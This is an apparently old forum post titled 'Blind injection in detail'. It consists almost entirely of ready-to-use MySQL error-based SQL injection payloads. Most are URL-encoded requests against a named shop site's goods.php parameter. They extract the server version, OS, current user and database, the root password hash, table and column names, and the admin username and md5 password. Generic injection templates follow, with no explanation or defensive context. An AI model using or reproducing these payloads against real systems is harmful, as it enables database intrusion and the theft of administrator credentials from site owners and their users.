Blind injection in detail

Posted on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table names
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database: the user_name column
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database: the password column
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Get the admin passwd (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)